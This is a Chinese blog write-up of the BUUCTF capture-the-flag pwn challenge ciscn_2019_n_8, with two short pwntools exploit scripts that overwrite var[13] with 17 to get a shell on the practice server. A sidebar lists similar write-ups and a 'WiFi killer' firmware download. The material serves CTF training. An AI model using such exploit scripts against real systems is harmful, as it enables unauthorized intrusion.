【BUUCTF-PWN】9-ciscn_2019_n_8

于 2024-07-05 00:19:02 发布
阅读量323 收藏 4
点赞数 8
分类专栏: CTF-PWN 文章标签: CTF BUUCTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43785509/article/details/140193338
版权

不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools

32位,开启了Stack、NX、PIE保护
在这里插入图片描述

执行效果:
在这里插入图片描述

main函数
在这里插入图片描述

使用通义千问询问的代码解读:
在这里插入图片描述

即当var数组的第十四个元素是17就可以
这里可以用两种payload:
第一种:
payload = b’a’134 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节
第二种:
payload = p32(17)*14

第一种对应的exp是:

from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = b'a'*13*4 + p32(17) 
io.sendlineafter("What's your name?\n",payload)
io.interactive()

执行结果:
在这里插入图片描述

但看网上帖子有的用这个exp没办法连通,解决办法可以参考:[BUUCTF-pwn]——ciscn_2019_n_8_[ciscn 2019华南]pwn8-CSDN博客

第二种对应的exp是:

from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = p32(17)*14
io.sendlineafter("What's your name?\n",payload)
io.interactive()

执行结果:

在这里插入图片描述

燕麦葡萄干
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 454
[buuctf]ciscn_2019_n_8
ciscn_2019_n_8 buuctf
XDiku的博客
01-21 666
ciscn_2019_n_8
ciscn_2019_n_8【BUUCTF
qq_41696518的博客
08-26 354
ciscn_2019_n_8
buuctfciscn_2019_n_8
weixin_54452942的博客
04-12 518
两个方法解题
[BUUCTF] ciscn_2019_n_8
最新发布
Lucien_Carr的博客
04-14 262
这道题非常简单(甚至比ret2text简单...),只需要满足让系统调用system函数的条件,即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件,只需要满足var[13] = 17就可以。前面有scanf函数,可以直接向var数组输入。开了canary、NX和PIE,似乎防得很严实。主函数里就调用了system函数,运气很好。32位程序,放到IDA中继续分析。攻击成功,运行结果如下。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF ciscn_2019_n_8
红叶的博客
10-31 265
一道通过Checksec让没看源代码的你觉得难度很高的题。
[BUUCTF]PWN13——ciscn_2019_n_8
mcmuyanga的博客
08-29 577
[BUUCTF]PWN13——ciscn_2019_n_8 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_8 步骤: 例行检查,32位,保护开的挺多,canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了system和bin/sh 双击跟进,ctrl+x查看哪里调用了这个字符串 很简单的一个程序,一开始让我们输入name,之后只要var[13]=
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 555
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF-PWN-ciscn_2019_n_8
Henlenl的博客
05-18 224
文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) IDA 分析 其实我们应该nc 连一下的查看远程程序运行情况 丢入 32位IDA分析一下 很显然 程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1829
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2621
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 2014
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值